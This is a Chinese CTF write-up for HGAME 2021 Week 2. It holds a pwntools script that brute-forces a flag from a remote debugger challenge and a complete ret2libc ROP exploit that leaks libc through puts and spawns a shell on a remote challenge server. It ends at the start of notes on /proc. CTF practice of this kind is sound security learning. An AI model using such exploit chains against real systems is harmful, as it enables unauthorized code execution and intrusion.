HGAME-WEEK2-WP
RE
fake_debugger beta
没搞懂,不同位置的不同字符对应的编码都不同,没什么思路,写了个脚本爆破了
#!/usr/bin/env python
# coding=utf-8
from pwn import *
#context(log_level = 'debug')
total_char = '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ-_=+|/?.>,<:;\"\'\\`~!@#$%^&*(){}[]'
def test(flag_now):
sh = remote("101.132.177.131",9999)
payload = flag_now
sh.sendlineafter("now!\n",payload)
for i in range(2 * len(flag_now)):
sh.sendlineafter("---\n",' ')
sh.recvuntil('eax: ')
code = int(sh.recvuntil("\n"))
sh.close()
return code
def get_next(flag_now):
sh = remote("101.132.177.131",9999)
payload = flag_now + 'a'
sh.sendlineafter("now!\n",payload)
for i in range(2 * len(flag_now) + 2):
sh.sendlineafter("---\n",' ')
sh.recvuntil('ebx: ')
code = int(sh.recvuntil("\n"))
return code
flag = 'hgame{You_Kn0w_debuG'
while(flag[-1] != '}'):
mapping = {}
for charac in total_char:
mapping[test(flag + charac)] = charac
#print(str(test(charac)) + ':' + charac + '=>' + mapping[test(charac)])
flag += mapping[get_next(flag)]
print flag
print flag
分了几次爆破,所以这个脚本的起点就几乎是 flag 了
HGAME2021-WEEK2-PWN-WP
rop_primary
没什么难度,就是单纯的 ROP
#!/usr/bin/env python
# coding=utf-8
from pwn import *
from LibcSearcher import *
import re
elf = ELF("./rop_primary")
pop_rdi_ret = 0x401613
pop_rsi_r15_ret = 0x401611
pop_r14_r15_ret = 0x401610
def matrixMul(A, B):
if len(A[0]) == len(B):
res = [[0] * len(B[0]) for i in range(len(A))]
for i in range(len(A)):
for j in range(len(B[0])):
for k in range(len(B)):
res[i][j] += int(A[i][k]) * int(B[k][j])
return res
sh = remote("159.75.104.107",30372)
sh.recvuntil("A:\n")
matA = []
matB = []
while 1:
number_string = sh.recvuntil("\n",drop = True)
if(number_string == 'B:'):
break
matA.append(re.findall(r"\d+\.?\d*",number_string))
while 1:
number_string = sh.recvuntil("\n",drop = True)
if(number_string == 'a * b = ?'):
break
matB.append(re.findall(r"\d+\.?\d*",number_string))
matAns = matrixMul(matA,matB)
print matAns
for i in matAns:
for j in i:
sh.sendline(str(j))
sh.recvuntil("best\n")
payload = 'a' * 0x30 + 'b' * 8 + p64(pop_rdi_ret) + p64(elf.got['puts']) + p64(elf.symbols["puts"]) + p64(0x40157B)
sh.sendline(payload)
leak_addr = u64(sh.recv(6).ljust(8,'\x00'))
log.success("addr:" + hex(leak_addr))
libc = LibcSearcher('puts',leak_addr)
libc_base = leak_addr - libc.dump("puts")
log.success("libc_base:" + hex(libc_base))
system_addr = libc_base + libc.dump("system")
bin_sh_addr = libc_base + libc.dump('str_bin_sh')
payload = 'a' * 0x30 + 'b' * 8 + p64(pop_r14_r15_ret) + p64(0) * 2
payload += p64(pop_rdi_ret) + p64(bin_sh_addr) + p64(system_addr)
sh.sendlineafter('best\n',payload)
sh.interactive()
写完exp打远程的时候发现搜不出来 libc,考虑是 libc-database 版本过低,然后尝试更新,但是 libc-database 本身是装 LibcSearcher 的时候一起装的,可能安装的时候有点问题,get 脚本用不来,所以只好整个 libc-database 删掉重装,重新 get,家里的带宽确实比较小,整个更新大概花了半个多小时,再加上更新的时候干别的事情去了差点把这题忘了,所以很晚才打通,但是运气还算不错,抢到了一血,只比二血早了30秒
…关于/proc目录
/proc 这个目录很牛,充满了信息
/proc 应该说是 Linux 一切皆文件的设计哲学的体现,其中的文件和目录本身都是虚拟的一个文件系统,提供理一些内核信息。里面的有些文件很有些用处,这里简单列举一下